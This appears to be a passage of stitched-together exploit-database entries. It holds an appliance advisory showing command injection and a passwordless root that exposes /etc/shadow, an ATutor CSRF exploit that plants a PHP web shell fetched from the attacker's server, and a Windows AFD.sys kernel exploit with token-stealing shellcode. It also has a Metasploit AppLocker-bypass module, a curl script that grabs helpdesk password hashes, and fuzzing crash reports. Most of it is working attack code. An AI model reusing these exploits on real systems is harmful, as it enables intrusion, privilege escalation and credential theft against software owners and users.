admin@box:> *uptime | ls*
bin home lost+found root sys config include mnt run tmp dev lib opt sbin usr
etc localization proc share var
At this point, basically you have full (indirect) control over the server.
admin@box:> *uptime | cat /etc/passwd *
root:x:0:0:root:/:/bin/sh
daemon:x:2:2:daemon:/sbin:/bin/false
messagebus:x:3:3:messagebus:/sbin:/bin/false
ntp:x:102:102:ntp:/var/empty/ntp:/bin/false
sshd:x:103:103:sshd:/var/empty:/bin/false
app:x:500:500:Linux Application:/:/bin/false
admin:x:1000:1000:Linux User,,,:/:/bin/msh
admin@box:> uptime | cat /etc/group
root:x:0:
wheel:x:1:admin
daemon:x:2:
messagebus:x:3:
adm:x:5:admin
power:x:20:app
serial:x:21:app
cio:x:22:app
lon:x:23:app
daemonsv:x:30:admin,app
utmp:x:100:
lock:x:101:
ntp:x:102:
sshd:x:103:
app:x:500:admin
admin:x:1000:admin
*3. Privilege Escalation / access to superuser 'root'*
CVE-ID: None [ Mitre, CVE? ]
Since this is an administrative user, an attacker can exploit OS command
injection to perform a variety of tasks from msh shell. But isn’t it better
to get a root shell instead.!
As observed from Issue 1 above, root does not have a password set, and it
is possible to use 'sudo -i' and become root.
*Note*: sudo is not presented / offered to 'admin' in the set of functional
options available thru msh. It is required for tech guys / legit admins /
SBO admins to manage the AS system and related functionality. Assumption
from SE team is, a low-skilled attacker / regular, unsophisticated,
non-technical user will not be able to figure it out. If someone does
figure it out, he/she will be responsible enough not to go evill.!
admin@box:> *sudo -i*
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
Password:
root@box:~> cat /etc/shadow
root:!:16650:0:99999:7:::
sshd:!:1:0:99999:7:::
admin:$6$<hash>:16652:0:99999:7:::
+++++
--
Best Regards,
Karn Ganeshen
/* exp.js
ATutor LMS <= 2.2.1 install_modules.php CSRF Remote Code Execution
by mr_me
Notes:
``````
- Discovered for @ipn_mx students advanced php vuln/dev class
- Tested on the latest FireFox 44.0.2 release build
- This poc simply uploads a zip file as pwn/si.php with a "<?php system($_GET['cmd']); ?>" in it
- You will need to set the Access-Control-Allow-Origin header to allow the target to pull zips
- Use this with your favorite XSS attack
- Student proof, aka bullet proof
Timeline:
`````````
23/02/2016 - notified vendor via info[at]atutor[dot]ca
24/02/2016 - requested CVE and assigned CVE-2016-2539
24/02/2016 - vendor replied stating they are investigating the issue
05/03/2016 - vendor patches the issue (https://github.com/atutor/ATutor/commit/bfc6c80c6c217c5515172f3cc949e13dfa1a92ac)
06/03/2016 - coordinated public release
Example:
````````
mr_me@jupiter:~$ cat poc.py
#!/usr/bin/python
import sys
import zipfile
import BaseHTTPServer
from cStringIO import StringIO
from SimpleHTTPServer import SimpleHTTPRequestHandler
if len(sys.argv) < 3:
print "Usage: %s <lport> <target>" % sys.argv[0]
print "eg: %s 8000 172.16.69.128" % sys.argv[0]
sys.exit(1)
def _build_zip():
"""
builds the zip file
"""
f = StringIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
z.writestr('pwn/si.php', "<?php system($_GET['cmd']); ?>")
z.close()
handle = open('pwn.zip','wb')
handle.write(f.getvalue())
handle.close
class CORSRequestHandler (SimpleHTTPRequestHandler):
def end_headers (self):
self.send_header('Access-Control-Allow-Origin', 'http://%s' % sys.argv[2])
SimpleHTTPRequestHandler.end_headers(self)
if __name__ == '__main__':
_build_zip()
BaseHTTPServer.test(CORSRequestHandler, BaseHTTPServer.HTTPServer)
mr_me@jupiter:~$ ./poc.py 8000 172.16.69.128
Serving HTTP on 0.0.0.0 port 8000 ...
172.16.69.1 - - [23/Feb/2016 14:04:07] "GET /exp.js HTTP/1.1" 200 -
172.16.69.1 - - [23/Feb/2016 14:04:07] "GET /pwn.zip HTTP/1.1" 200 -
~ de Mexico con amor,
*/
var get_hostname = function(href) {
var l = document.createElement("a");
l.href = href;
return l.hostname + ":" + l.port;
};
function trolololol(url, file_data, filename) {
var file_size = file_data.length,
boundary = "828116593165207937691721278",
xhr = new XMLHttpRequest();
// latest ff doesnt have sendAsBinary(), so we redefine it
if(!xhr.sendAsBinary){
xhr.sendAsBinary = function(datastr) {
function byteValue(x) {
return x.charCodeAt(0) & 0xff;
}
var ords = Array.prototype.map.call(datastr, byteValue);
var ui8a = new Uint8Array(ords);
this.send(ui8a.buffer);
}
}
// the callback after this stage is done...
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
xhr = new XMLHttpRequest();
// change this if you change the zip
xhr.open("GET", "/ATutor/mods/pwn/si.php?cmd=id", true);
xhr.send();
}
}
xhr.open("POST", url, true);
// simulate a file MIME POST request.
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
xhr.setRequestHeader("Content-Length", file_size);
var body = "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="modulefile"; filename="' + filename + '"\r\n';
body += "Content-Type: archive/zip\r\n\r\n";
body += file_data + "\r\n";
body += "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="install_upload"\r\n\r\n';
body += "junk\r\n";
body += "--" + boundary;
xhr.sendAsBinary(body);
return true;
}
function pwn(){
var xhr = new XMLHttpRequest();
// et phone home
var home = get_hostname(document.scripts[0].src);
// get our own zip file
xhr.open('GET', 'http://' + home + '/pwn.zip', true);
xhr.responseType = 'blob';
xhr.onload = function(e) {
if (this.status == 200) {
// use the FileReader class to get the raw binary
var reader = new window.FileReader();
reader.readAsBinaryString(new Blob([this.response], {type: 'application/zip'}));
reader.onloadend = function() {
trolololol("/ATutor/mods/_core/modules/install_modules.php", reader.result, "pwn.zip");
}
}
};
xhr.send();
}
pwn();
# Exploit Title: MS14-040 - AFD.SYS Dangling Pointer
# Date: 2016-03-03
# Exploit Author: Rick Larabee
# Vendor Homepage: www.microsoft.com
# Version: Windows 7, 64 bit
# Tested on: Win7 x64
# afd.sys - 6.1.7601.17514
# ntdll.dll - 6.1.7601.17514
#
# CVE : CVE-2014-1767
# Category: Local Privilege Escalation
# References:
# http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf
# http://ricklarabee.blogspot.com/
# https://warroom.securestate.com/ms14-040-afd-sys-dangling-pointer-further-analysis/
# https://technet.microsoft.com/en-us/library/security/ms14-040.aspx
# http://www.cvedetails.com/cve/CVE-2014-1767/
# https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/
#
# Greetz: PWN4GEPWN1E, SecurityMook
from ctypes import *
import socket, time, os, struct, sys
from ctypes.wintypes import HANDLE, DWORD
import platform
kernel32 = windll.kernel32
ntdll = windll.ntdll
Psapi = windll.Psapi
MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x40
Zerobits = c_int(0)
RegionSize = c_ulonglong(0x1000)
written = c_ulonglong(0)
FakeObjSize = 0x100
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
GENERIC_EXECUTE = 0x20000000
GENERIC_ALL = 0x10000000
INVALID_HANDLE_VALUE = -1
WSAGetLastError = windll.Ws2_32.WSAGetLastError
WSAGetLastError.argtypes = ()
WSAGetLastError.restype = c_int
SOCKET = c_int
WSASocket = windll.Ws2_32.WSASocketA
WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
WSASocket.restype = SOCKET
closesocket = windll.Ws2_32.closesocket
closesocket.argtypes = (SOCKET,)
closesocket.restype = c_int
connect = windll.Ws2_32.connect
connect.argtypes = (SOCKET, c_void_p, c_int)
connect.restype = c_int
HalDispatchTable = c_uint64
class sockaddr_in(Structure):
_fields_ = [
("sin_family", c_short),
("sin_port", c_ushort),
("sin_addr", c_ulong),
("sin_zero", c_char * 8),
]
kernel32.WriteProcessMemory.argtypes = [c_ulonglong, c_ulonglong, c_char_p, c_ulonglong, POINTER(c_ulonglong)]
ntdll.NtAllocateVirtualMemory.argtypes = [c_ulonglong, POINTER(c_ulonglong), c_ulonglong, POINTER(c_ulonglong),c_ulonglong,c_ulonglong]
def find_driver_base(driver=None):
#https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py
if platform.architecture()[0] == '64bit':
lpImageBase = (c_ulonglong * 1024)()
lpcbNeeded = c_longlong()
Psapi.GetDeviceDriverBaseNameA.argtypes = [c_longlong, POINTER(c_char), c_uint32]
else:
#if process_is_wow64():
# raise RuntimeError('python running in WOW64 is not supported')
lpImageBase = (c_ulong * 1024)()
lpcbNeeded = c_long()
driver_name_size = c_long()
driver_name_size.value = 48
Psapi.EnumDeviceDrivers(byref(lpImageBase), c_int(1024), byref(lpcbNeeded))
for base_addr in lpImageBase:
driver_name = c_char_p('\x00' * driver_name_size.value)
if base_addr:
Psapi.GetDeviceDriverBaseNameA(base_addr, driver_name, driver_name_size.value)
if driver == None and driver_name.value.lower().find("krnl") != -1:
return (base_addr, driver_name.value)
elif driver_name.value.lower() == driver:
return (base_addr, driver_name.value)
return None
def get_haldispatchtable():
#https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py
if platform.architecture()[0] == '64bit':
kernel32.LoadLibraryExA.restype = c_uint64
kernel32.GetProcAddress.argtypes = [c_uint64, POINTER(c_char)]
kernel32.GetProcAddress.restype = c_uint64
(krnlbase, kernelver) = find_driver_base()
hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
halDispatchTable = kernel32.GetProcAddress(hKernel, 'HalDispatchTable')
halDispatchTable -= hKernel
halDispatchTable += krnlbase
return halDispatchTable
def CreateBuffer1(inbuf1addr):
print "[+] Creating Buffer for IOCTL 0x1207F (afdTransmitFile) at: ", hex(inbuf1addr)
inbuf1size = 0x40
targetsize = 0x100
virtualAddress = 0x13371337
mdlsize = (pow(2, 0x0c) * (targetsize -0x30) / 8) - 0xfff - (virtualAddress & 0xfff)
inbuf1 = "\x41" * 0x20
inbuf1 += struct.pack("Q", virtualAddress) #0x1a
inbuf1 += struct.pack("Q", mdlsize)
inbuf1 += "\x42" * 4
inbuf1 += "\x43" * 4
inbuf1 += "\x01\x00\x00\x00"
inbuf1 += "\x00\x00\x00\x00"
inbuf1 += "\x00" * (inbuf1size - len(inbuf1))
baseadd = c_ulonglong(0x1001)
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
byref(baseadd),
0x0,
byref(RegionSize),
MEMRES,
PAGEEXE)
wpmStatus = kernel32.WriteProcessMemory(-1, inbuf1addr, inbuf1, inbuf1size, byref(written))
def CreateBuffer2(inbuf2addr):
print "[+] Creating Buffer for IOCTL 0x120C3 (afdTransmitPacket) at: ", hex(inbuf2addr)
inbuf2size = 0x18
addrforbuf2 = 0x0AAAAAAA
inbuf2 = struct.pack("Q", 0x1)
inbuf2 += struct.pack("Q", addrforbuf2)
inbuf2 += "\x00" * (inbuf2size -len(inbuf2))
baseadd = c_ulonglong(inbuf2addr+1)
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
byref(baseadd),
0x0,
byref(RegionSize),
MEMRES,
PAGEEXE)
kernel32.WriteProcessMemory(-1, inbuf2addr, inbuf2, inbuf2size, byref(written))
def CreateFakeObject(firstWrite,fakeobjectaddr, setinfoworkerfactory):
print "[+] Print creating fakeobject at ", hex(fakeobjectaddr)
fakeobject2addr = setinfoworkerfactory - 0x18
fakeobject2 = "\x00"*0x18 + struct.pack("Q", firstWrite)
fakeobj2size = len(fakeobject2)
kernel32.WriteProcessMemory(-1, fakeobject2addr, fakeobject2, fakeobj2size, byref(written))
objhead = ("\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x08\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
fakeobject = objhead
fakeobject += struct.pack("Q", fakeobject2addr) + "\x41"*96
fakeobject += "\x42" * (FakeObjSize - len(fakeobject))
kernel32.WriteProcessMemory(-1, fakeobjectaddr, fakeobject, FakeObjSize, byref(written))
def main():
print "[+] creating socket..."
sock = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP, None, 0, 0)
if sock == -1:
print "[-] no luck creating socket!"
sys.exit(1)
print "[+] got sock 0x%x" % sock
addr = sockaddr_in()
addr.sin_family = socket.AF_INET
addr.sin_port = socket.htons(135)
addr.sin_addr = socket.htonl(0x7f000001)
connect(sock, byref(addr), sizeof(addr))
print "[+] sock connected."
print "[+] fill kernel heap"
rgnarr = []
nBottomRect = 0x02aaaaaa
while(1):
hrgn = windll.gdi32.CreateRoundRectRgn(0,0,1,nBottomRect,1,1)
if hrgn == 0:
break
rgnarr.append(hrgn)
print ".",
print "\n[+] GO!"
HalDispatchTable = get_haldispatchtable()
print "[+] HalDispatchTable address:", hex(HalDispatchTable)
# Win7 - x64
(halbase, dllname) = find_driver_base("hal.dll")
OS = "7"
if OS == "7":
HaliQuerySystemInformation = halbase+0x398e8 # Offset for win7 x64
_KPROCESS = "\x70"
_TOKEN = "\x08\x02"
_UPID = "\x80\x01"
_APLINKS = "\x88\x01"
print "[+] HaliQuerySystemInformation:", hex(HaliQuerySystemInformation)
IoStatus = c_ulonglong()
IoStatusBlock = c_ulonglong()
addrSetInfoWorkerFactory = 0x2218
firstWriteAddr = HalDispatchTable + 0x8 - 0x2C
secondWriteAddr = firstWriteAddr + 0x4
thirdWriteAddr = firstWriteAddr + 0x1
shellcode_address = c_ulonglong
shellcode_address = 0x0000000000002500
what_address = 0x0000250800002500
what_part1 = what_address & 0xfffffff
what_part2 = what_address >> 32 & 0xfffffff
inbuf1 = 0x1000
inbuf2 = 0x2000
hWF = c_ulonglong(0)
FakeWorkerFactoryADDR = 0x2100
CreateBuffer1(inbuf1)
CreateBuffer2(inbuf2)
CreateFakeObject(firstWriteAddr, FakeWorkerFactoryADDR, addrSetInfoWorkerFactory)
print ""
print ""
print "[*] Trigger IOCTL 0x1207f (afdTransmitFile) to setup the memory "
print "[*] structures for phase 2 and fil the freed space with a "
print "[*] WorkerFactory Object"
raw_input("[+] Press Enter to trigger phase 1")
ntdll.ZwDeviceIoControlFile.argtypes = [c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, POINTER(c_ulonglong),
c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong]
status = ntdll.ZwDeviceIoControlFile(sock,0x0,0x0,0x0,byref(IoStatusBlock),0x1207f, inbuf1, 0x40, 0x0, 0x0)
kernel32.CreateIoCompletionPort.argtypes = [c_ulonglong,c_ulonglong,c_ulonglong,c_ulonglong]
CompletionPort = HANDLE(kernel32.CreateIoCompletionPort( INVALID_HANDLE_VALUE, 0, 0, 0))
ntdll.ZwCreateWorkerFactory.argtypes = [POINTER(c_ulonglong), c_ulonglong, c_ulonglong, c_void_p, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong]
ntdll.ZwCreateWorkerFactory(byref(hWF),GENERIC_ALL,0,CompletionPort,INVALID_HANDLE_VALUE,0,0,0,0,0)
hWFaddr = hWF
padding = "\x90"*8
HalDispatchTable0x8 = HalDispatchTable + 0x8
sc_pointer = struct.pack("Q", shellcode_address+0x10)
sc_pointer += struct.pack("Q", 0x25)
restore_ptrs = "\x41\x51" +\
"\x41\x52" +\
"\x41\x53" +\
"\x49\xb9" + struct.pack("Q", HaliQuerySystemInformation) +\
"\x49\xba" + struct.pack("Q", HalDispatchTable0x8) +\
"\x4d\x89\x0a"
tokenstealing = "\x65\x4C\x8B\x0C\x25\x88\x01\x00\x00" +\
"\x4D\x8B\x89" + _KPROCESS + "\x00\x00\x00" +\
"\x4D\x89\xCA" +\
"\x4D\x8B\x89" + _APLINKS + "\x00\x00" +\
"\x49\x81\xE9" + _APLINKS + "\x00\x00" +\
"\x49\x83\xB9" + _UPID + "\x00\x00\x04" +\
"\x75\xe8" +\
"\x4D\x8B\x89" + _TOKEN + "\x00\x00" +\
"\x4D\x89\x8A" + _TOKEN + "\x00\x00"
fixobjheaders = "\x4d\x8b\x92\x00\x02\x00\x00" +\
"\x4d\x89\xd1" +\
"\x4d\x8b\x12" +\
"\x41\xbb" + struct.pack("L", hWF.value)+\
"\x41\x83\xe3\xfc" +\
"\x4d\x01\xdb" +\
"\x4d\x01\xdb" +\
"\x4d\x01\xda" +\
"\x49\xc7\x02\x00\x00\x00\x00" +\
"\x49\x83\xc1\x58" +\
"\x4d\x89\xca" +\
"\x4d\x8b\x09" +\
"\x49\x83\xe9\x01" +\
"\x4d\x89\x0a" +\
"\x41\x5b" +\
"\x41\x5A" +\
"\x41\x59" +\
"\xc3"
shellcode = sc_pointer + padding + restore_ptrs + tokenstealing + fixobjheaders
shellcode_size = len(shellcode)
print "\n\n[+] Writing Shellcode at address: ", hex(shellcode_address)
kernel32.WriteProcessMemory(-1, shellcode_address, shellcode, shellcode_size, byref(written))
print "\n\n[*] Triggering IOCTL 0x120c3 (afdTransmitPackets) to free the"
print "[*] WorkerFactory object created above and fill the freed object"
print "[*] with a user controlled object to perform the necessary overwrites"
raw_input("[+] Press Enter to trigger phase 2")
### Trigger 2
## afd!AfdTransmitPackets
ntdll.ZwDeviceIoControlFile(sock,0x0,0x0,0x0,byref(IoStatusBlock),0x120c3, inbuf2, 0x18, 0x0, 0x0)
ntdll.ZwQueryEaFile(INVALID_HANDLE_VALUE, byref(IoStatus), None, 0, False, FakeWorkerFactoryADDR, FakeObjSize-0x04, None, False)
ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part1, 0x4)
kernel32.WriteProcessMemory(-1, addrSetInfoWorkerFactory, struct.pack("Q", secondWriteAddr), 0x8, byref(written))
ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part2, 0x4)
kernel32.WriteProcessMemory(-1, addrSetInfoWorkerFactory, struct.pack("Q", thirdWriteAddr), 0x8, byref(written))
ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part2, 0x4) ;
inp = c_long()
out = c_long()
inp = 0x1337
qip = ntdll.NtQueryIntervalProfile(inp, byref(out))
print "[*] Spawning a SYSTEM shell..."
os.system("cmd.exe /K cd c:\\windows\\system32")
if __name__ == "__main__":
if platform.architecture()[0] == '64bit':
main()
else:
print "Please use a 64 bit version of python"
sys.exit()
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class Metasploit4 < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Post::File
def initialize(info={})
super(update_info(info,
'Name' => 'AppLocker Execution Prevention Bypass',
'Description' => %q{
This module will generate a .NET service executable on the target and utilise
InstallUtil to run the payload bypassing the AppLocker protection.
Currently only the InstallUtil method is provided, but future methods can be
added easily.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Casey Smith', # Original AppLocker bypass research
'OJ Reeves' # MSF module
],
'Platform' => [ 'win' ],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [ [ 'Windows', {} ] ],
'DefaultTarget' => 0,
'DisclosureDate'=> 'Aug 3 2015',
'References' =>
[
['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57']
]
))
register_options([
OptEnum.new('TECHNIQUE', [true, 'Technique to use to bypass AppLocker',
'INSTALLUTIL', %w(INSTALLUTIL)])])
end
# Run Method for when run command is issued
def exploit
if datastore['TECHNIQUE'] == 'INSTALLUTIL'
if payload.arch.first == 'x64' && sysinfo['Architecture'] !~ /64/
fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.')
end
end
# sysinfo is only on meterpreter sessions
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
if datastore['TECHNIQUE'] == 'INSTALLUTIL'
execute_installutil
end
end
def execute_installutil
envs = get_envs('TEMP', 'windir')
dotnet_path = get_dotnet_path(envs['windir'])
print_status("Using .NET path #{dotnet_path}")
cs_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.cs"
exe_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.exe"
installutil_path = "#{dotnet_path}\\InstallUtil.exe"
print_status("Writing payload to #{cs_path}")
write_file(cs_path, generate_csharp_source)
register_files_for_cleanup(cs_path)
print_status("Compiling payload to #{exe_path}")
csc_path = "#{dotnet_path}\\csc.exe"
csc_platform = payload.arch.first == 'x86' ? 'x86' : 'x64'
vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")
cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")
print_status("Executing payload ...")
vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}")
client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", {'Hidden' => true})
register_files_for_cleanup(exe_path)
end
def get_dotnet_path(windir)
base_path = "#{windir}\\Microsoft.NET\\Framework#{payload.arch.first == 'x86' ? '' : '64'}"
paths = dir(base_path).select {|p| p[0] == 'v'}
dotnet_path = nil
paths.reverse.each do |p|
path = "#{base_path}\\#{p}"
if directory?(path) && file?("#{path}\\InstallUtil.exe")
dotnet_path = path
break
end
end
unless dotnet_path
fail_with(Failure::NotVulnerable, '.NET is not present on the target.')
end
dotnet_path
end
def generate_csharp_source
sc = payload.encoded.each_byte.map {|b| "0x#{b.to_s(16)}"}.join(',')
cs = %Q^
using System;
namespace Pop
{
public class Program { public static void Main() { } }
[System.ComponentModel.RunInstaller(true)]
public class Pop : System.Configuration.Install.Installer
{
private static Int32 MEM_COMMIT=0x1000;
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
private static UInt32 INFINITE = 0xFFFFFFFF;
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
public override void Uninstall(System.Collections.IDictionary s)
{
byte[] sc = new byte[] {#{sc}};
IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length);
IntPtr id = IntPtr.Zero;
WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE);
}
}
}
^
cs
end
end
#!/bin/bash
#####################################################################################
# Exploit Title: Cerberus Helpdesk (Cerb5) Password Hash Grabbing #
# Date: 04.02.2016 #
# Exploit Author: asdizzle_ #
# Vendor Homepage: http://www.cerberusweb.com/ #
# Software Link: http://www.cerberusweb.com/downloads/cerb5/archive/cerb5-5_4_4.zip #
# Version: 5 - 6.7 #
# Tested on: Debian 8 / apache2 with cerb 5 #
#####################################################################################
# Prerequisites: #
# -At least one worker must be logged in #
# -/storage/tmp/ dir must be accessible #
# #
# If everything else fails try if there's directory listing in /storage/tmp #
# You might find attachments and even support tickets. #
#####################################################################################
url='http://172.16.15.137/cerb5/5.4.4' # Full url (without /index.php/ !)
pre='devblocks' # If this doesn't work try 'zend'
echo "[*] Trying to fetch cache file"
cachechk=$(curl -s $url"/storage/tmp/"$pre"_cache---ch_workers" | grep pass)
if [ -z "$cachechk" ];then
echo "[-] File not found."
exit
else
echo "[+] Found. Extracting..."
hashes=$(echo "$cachechk" | sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g')
if [ -z "$hashes" ];then
echo "[-] Hash extracting failed"
else
echo "[+] Extracting seems to have worked"
echo
echo "$hashes"
fi
fi
Source: https://code.google.com/p/google-security-research/issues/detail?id=739
The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==6853==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400009d960 at pc 0x7ff7905dc0fe bp 0x7fff079e9fc0 sp 0x7fff079e9fb8
READ of size 4 at 0x60400009d960 thread T0
#0 0x7ff7905dc0fd in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:161:20
#1 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4
#2 0x52a08b in load_cap_file wireshark/tshark.c:3685:3
#3 0x51e4bc in main wireshark/tshark.c:2213:13
0x60400009d960 is located 16 bytes inside of 40-byte region [0x60400009d950,0x60400009d978)
freed by thread T0 here:
#0 0x4c1d80 in __interceptor_free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30
#1 0x7ff7905dc32f in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:173:9
#2 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4
#3 0x52a08b in load_cap_file wireshark/tshark.c:3685:3
#4 0x51e4bc in main wireshark/tshark.c:2213:13
previously allocated by thread T0 here:
#0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7ff77bc84610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x7ff79055907d in pcapng_read wireshark/wiretap/pcapng.c:2564:35
#3 0x7ff7905d825b in wtap_read wireshark/wiretap/wtap.c:1253:7
#4 0x528036 in load_cap_file wireshark/tshark.c:3499:12
#5 0x51e4bc in main wireshark/tshark.c:2213:13
SUMMARY: AddressSanitizer: heap-use-after-free wireshark/wiretap/wtap_opttypes.c:161:20 in wtap_optionblock_free
Shadow bytes around the buggy address:
0x0c088000bad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000bae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000baf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000bb00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000bb10: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 fa
=>0x0c088000bb20: fa fa 00 00 00 00 00 fa fa fa fd fd[fd]fd fd fa
0x0c088000bb30: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
0x0c088000bb40: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
0x0c088000bb50: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
0x0c088000bb60: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 fa
0x0c088000bb70: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==6853==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12173. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39529.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=668
The attached PE file causes memory corruption in Avast, it looks related to authenticode parsing.
(474.c0c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740b4454 esp=10cedfa8 ebp=12555e70 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
aswCmnBS_74080000!StreamHashClose+0x7dd4:
740b4454 8b06 mov eax,dword ptr [esi] ds:002b:30303030=????????
0:080> ub
aswCmnBS_74080000!StreamHashClose+0x7dc5:
740b4445 55 push ebp
740b4446 56 push esi
740b4447 57 push edi
740b4448 33ff xor edi,edi
740b444a 8be9 mov ebp,ecx
740b444c 85db test ebx,ebx
740b444e 7447 je aswCmnBS_74080000!StreamHashClose+0x7e17 (740b4497)
740b4450 8b742418 mov esi,dword ptr [esp+18h]
0:080> dd esp+18 L1
10cedfc0 30303030
# It looks like this address was a parameter, lets skip up a frame and see where it comes from
0:080> kvn 3
# ChildEBP RetAddr Args to Child..............
WARNING: Stack unwind information not available. Following frames may be wrong.
00 10cedfb4 740b483e 30303030 30303030 a00be921 aswCmnBS_74080000!StreamHashClose+0x7dd4
01 10cedfe8 740c37e7 12481a88 00cf0400 00000008 aswCmnBS_74080000!StreamHashClose+0x81be
02 10cee028 740aa2f5 12481a90 00001730 00030408 aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7
0:080> .frame /c 1
01 10cedfe8 740c37e7 aswCmnBS_74080000!StreamHashClose+0x81be
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740b483e esp=10cedfbc ebp=73e1dca8 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
aswCmnBS_74080000!StreamHashClose+0x81be:
740b483e 8bf8 mov edi,eax
0:080> ub.
aswCmnBS_74080000!StreamHashClose+0x81aa:
